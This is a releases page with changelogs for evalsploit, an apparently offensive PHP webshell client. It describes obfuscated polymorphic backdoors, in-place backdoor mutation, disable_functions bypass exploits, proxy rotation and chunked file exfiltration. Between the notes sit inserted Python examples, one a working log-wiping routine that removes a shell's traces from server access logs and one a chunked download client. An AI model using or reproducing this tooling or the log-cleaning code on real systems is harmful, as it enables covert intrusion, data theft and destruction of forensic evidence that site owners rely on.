
Releases: MarkTauber/evalsploit

Evalsploit [3.1.0]

02 Mar 18:28


[v3.1.0] - 2026-03-02

Changelog

Notable changes compared to the previous codebase (evalsploit, 3.0.0).


[3.1.0]

New commands

  • sql - Interactive SQL console via PDO. Supports MySQL and PostgreSQL in one command (sql user:pass@host[:port][/db]). Verifies connection before entering the REPL. USE dbname is handled client-side by rebuilding the PDO DSN - no extra HTTP request. DSN auto-saved to settings.ini on successful connect.
  • grep - Recursive file content search using RecursiveIteratorIterator. Accepts PHP regex with optional -i flag. No exec required.
  • find - Recursive filename search using RecursiveIteratorIterator. PHP regex, case-insensitive by default. No exec required.

New plugin

  • clearlog - Removes matching lines from server log files. Three modes:
    • clearlog detect - scans common log paths via glob(), shows [rw]/[r-] write status for each file.
    • clearlog all [pattern] - cleans all writable logs; skips read-only files; requires confirmation.
    • clearlog <path> [pattern] - cleans a single file.
    • Default pattern: URL path from session config (e.g. /shell.php).
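The three clearlog modes, written out as an added Python example rather than the plugin's code. The glob list is an assumption (the plugin's own paths are not on the page), the pattern is a regex as with grep above, and the sample access log is constructed inline. A defender's caveat worth keeping in mind: the in-place rewrite shrinks the file and updates its mtime, which log shippers and file-integrity monitoring can notice, and lines already forwarded to a remote collector are untouched.

```python
import glob
import os
import re
import tempfile

# Assumption: typical web-server log locations; the real plugin's list is not shown.
LOG_GLOBS = ["/var/log/apache2/*.log", "/var/log/nginx/*.log", "/var/log/httpd/*_log"]


def detect_logs(patterns=LOG_GLOBS) -> list[tuple[str, str]]:
    """`clearlog detect`: expand globs and tag each file [rw] or [r-] by write access."""
    found = []
    for pat in patterns:
        for path in sorted(glob.glob(pat)):
            if os.path.isfile(path):
                status = "[rw]" if os.access(path, os.W_OK) else "[r-]"
                found.append((path, status))
    return found


def clean_log(path: str, pattern: str) -> int:
    """`clearlog <path> [pattern]`: drop lines matching the regex; return how many were removed."""
    rx = re.compile(pattern)
    with open(path, "rb") as fh:
        lines = fh.read().splitlines(keepends=True)
    kept = [ln for ln in lines if not rx.search(ln.decode("utf-8", "replace"))]
    removed = len(lines) - len(kept)
    if removed:
        with open(path, "wb") as fh:   # truncating rewrite: size and mtime change
            fh.writelines(kept)
    return removed


def clean_all(patterns, pattern: str) -> dict[str, int]:
    """`clearlog all [pattern]`: clean every writable log, skip read-only ones."""
    return {p: clean_log(p, pattern) for p, st in detect_logs(patterns) if st == "[rw]"}


def demo() -> tuple[int, int, str]:
    """Constructed sample: two /shell.php hits among four access-log lines."""
    d = tempfile.mkdtemp()
    log = os.path.join(d, "access.log")
    sample = (
        b'10.0.0.1 - - [02/Mar/2026:18:28:01 +0000] "GET /index.php HTTP/1.1" 200 512\n'
        b'10.0.0.9 - - [02/Mar/2026:18:28:05 +0000] "POST /shell.php HTTP/1.1" 200 77\n'
        b'10.0.0.2 - - [02/Mar/2026:18:28:07 +0000] "GET /about.html HTTP/1.1" 200 2048\n'
        b'10.0.0.9 - - [02/Mar/2026:18:28:09 +0000] "POST /shell.php HTTP/1.1" 200 91\n'
    )
    with open(log, "wb") as fh:
        fh.write(sample)
    status = detect_logs([os.path.join(d, "*.log")])[0][1]
    # default pattern is the shell's URL path; escape it so '.' is literal
    removed = clean_all([os.path.join(d, "*.log")], re.escape("/shell.php"))[log]
    with open(log, "rb") as fh:
        remaining = len(fh.read().splitlines())
    return removed, remaining, status
```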

Chunked download

  • Added dl_chunked.php snippet: uses fseek/fread to transfer files in 1 MB blocks per request. PHP memory_limit no longer limits download size.
  • Live progress bar: 45.0 MB / 512.0 MB (8%), updated per chunk.
  • Switch with set download chunked / set download dl (default).
  • Detection is automatic: dl_mod.py uses chunked logic whenever the loaded snippet contains $_OFFSET.
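The client side of the chunked transfer, as an added Python example (not dl_mod.py): snippet-mode detection on the `$_OFFSET` placeholder, the 1 MB offset loop, and the progress line in the format quoted above. The HTTP round trip is replaced by an in-memory stand-in, and the snippet strings are constructed stand-ins that only need to contain or omit `$_OFFSET`. The size formatter deliberately handles a zero-byte file without calling log(), the same edge case the stat.php fix under Bug fixes below addresses.

```python
CHUNK = 1024 * 1024  # 1 MB per request, as in dl_chunked.php

# Constructed stand-ins for the two snippets; only the $_OFFSET placeholder matters here.
SNIPPET_DL = "<?php echo base64_encode(file_get_contents($_PATH)); ?>"
SNIPPET_DL_CHUNKED = ("<?php $fh=fopen($_PATH,'rb'); fseek($fh,$_OFFSET); "
                      "echo base64_encode(fread($fh,$_LEN)); ?>")


def is_chunked(snippet: str) -> bool:
    """Automatic detection: chunked logic whenever the loaded snippet uses $_OFFSET."""
    return "$_OFFSET" in snippet


def human_size(n: int) -> str:
    """Binary units with one decimal. Uses repeated division instead of
    floor(log(n)/log(1024)), which breaks on n == 0."""
    units = ["B", "KB", "MB", "GB", "TB"]
    if n <= 0:
        return "0.0 B"
    v, i = float(n), 0
    while v >= 1024 and i < len(units) - 1:
        v /= 1024
        i += 1
    return f"{v:.1f} {units[i]}"


def progress_line(done: int, total: int) -> str:
    pct = 0 if total == 0 else done * 100 // total
    return f"{human_size(done)} / {human_size(total)} ({pct}%)"


class FakeServer:
    """Stands in for the webshell: answers a size query and byte-range reads."""
    def __init__(self, data: bytes):
        self.data = data
        self.requests = 0

    def size(self) -> int:
        return len(self.data)

    def read(self, offset: int, length: int) -> bytes:
        self.requests += 1
        return self.data[offset:offset + length]


def download(server, snippet: str, chunk: int = CHUNK, progress=None) -> bytes:
    """Whole-file read for the legacy snippet; fseek/fread-style offset loop otherwise."""
    total = server.size()
    if not is_chunked(snippet):
        return server.read(0, total)
    buf, offset = bytearray(), 0
    while offset < total:
        part = server.read(offset, chunk)
        if not part:
            raise IOError(f"short read at offset {offset}")  # file shrank or request failed
        buf += part
        offset += len(part)
        if progress:
            progress(progress_line(offset, total))
    return bytes(buf)
```

Each chunk costs one request, so a 512 MB file is 512 round trips; the payoff is that neither PHP's memory_limit nor the base64 expansion of the whole file ever has to fit in one response.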

PHP 8 improvements

  • mutate - Now auto-detects PHP version before generating the replacement backdoor. PHP ≥ 8: uses generate_php8_backdoor() (eval-based, no create_function). PHP < 8: uses generate_polymorphic_backdoor() (create_function via variable, obfuscated). Version and mutator type printed before rewriting the file.
  • gen / payload menu - The create_function bypass variant is now labeled "Function bypass (PHP < 8 only)" to prevent accidentally deploying it on PHP 8 targets.

Bug fixes

  • rename.php - Previously produced no output; the Python module always printed "Renamed" regardless of success. Snippet now outputs OK on success and ERR on failure; ren_mod.py checks the result.
  • stat.php - stat() return value was not checked. On a missing or unreadable path, the code crashed trying to access $stat['size'] on false. Added @stat() with a === false guard and an ERR: cannot stat message. Also fixed a log(0) division-by-zero on zero-size files.
  • sql_query_php.php - With PDO::ERRMODE_EXCEPTION, query() throws on failure and never returns false. The if (!$_stmt) branch was unreachable dead code. Removed; the result-display path now runs unconditionally.
  • mf.php / create - create reported "File created" even when the file already existed (the snippet silently did nothing). Snippet now outputs EXISTS when the file is present; mkf_mod.py reports "File already exists".

Evalsploit [3.0.0]

01 Mar 01:31


[v3.0.0] - 2026-03-01

Changelog

Notable changes compared to the previous codebase (evalsploit 2.7.x).


[3.0.0]

Architecture and install

  • Package layout – Single script and flat modules/ replaced by installable package evalsploit (pyproject.toml, pip install -e .). Entry point: evalsploit or python -m evalsploit.
  • Startup menu – On start: choose Payload / Session / URL / Last connection / Proxies / Exit. No more single URL + proxy prompts; session can be restored or new URL entered.
  • Data layout – Settings, sessions, and useragents live under data/ (e.g. data/settings.ini, data/sessions/, data/useragents). .gitignore added for local data and build/IDE artifacts.

Sessions and config

  • Sessions – Save current connection (URL, Z, V, send_mode) with save <name>; list with sessions; switch with connect <name> or by number at startup. Replaces “leave URL empty to restore last” with explicit named sessions.
  • Config – Single config object (dataclass) with load/save for global settings and per-session overrides. No config file read on every send.
  • set – Unified set <module> <value> and set <module> help for run, ls, cat, send, silent, reverse, confirm, proxy. Messages in English.

Transport and payload

  • Send modes – Same modes (bypass, classic, simple); Z and V taken from config (no hardcoded Z in classic). On connect, client tries each mode and stores the working one (unless silent).
  • Polymorphic payloads – Backdoor generation with multiple shapes (if/do/while/for), obfuscated create_function, str_replace/strtr/preg_replace (including XOR). PHP 8 variant without create_function. gen prints payloads for current send mode and Z, V.
  • Mutation – Replaces the backdoor line in the infected file on the server with a new polymorphic payload and updates local Z, V. No separate “reset” command.

Proxy

  • Proxy list – Proxies loaded from data/proxies.txt (one host:port per line). Validation via HTTP request; list of validated indices. One proxy per session (random or by index).
  • proxy_switch – Change current proxy without leaving the shell: no args (new random), N (proxy #), or random.

Commands and UX

  • Exploit – Single exploit command: no args → menu by ID (1–N from EXPLOIT_DIRS, Enter = default 7.3–8.1, 0 = back); with arg (e.g. exploit 7.0-7.4) use that bypass directly. Replaces four separate exploit functions and fixed prompt.
  • Paths – Two-path commands (cp, ren/mv, upload with remote path, download to path) use : as separator; paths may contain spaces.
  • Confirm – Optional confirmation for dangerous actions (rm/del, upload, mutate, edit); set confirm 0/1.
  • try / detect – Check which run variants (exec, shell_exec, etc.) work on the server.
  • help – In-session help for commands; no banner dump.

Plugins and snippets

  • Plugins – Custom commands via Python modules in evalsploit/plugins/ (registry, no core edits).
  • Snippets – Command behaviour (rm, dl, upload, rename, stat, touch, mkdir, create, copy) configurable via evalsploit/modules/snippets/snippets.ini and set <cmd> <style>.

Removed / simplified

  • Language – CLI and built-in messages in English; README in EN, RU, ZH.
  • reset – Removed; use new session or change Z, V via mutate/gen and config.
  • Banner – No long ASCII banner at start; minimal startup menu.

Technical

  • Python – Requires Python 3.10+.
  • Dependencies – requests; no configparser in hot path.
  • Send – Centralized in evalsploit.transport.send; marker-based output parsing (ignore everything before marker).

Evalsploit [2.6.0]

15 Aug 00:47
921a7d4


[v2.6.1] - 2023-08-15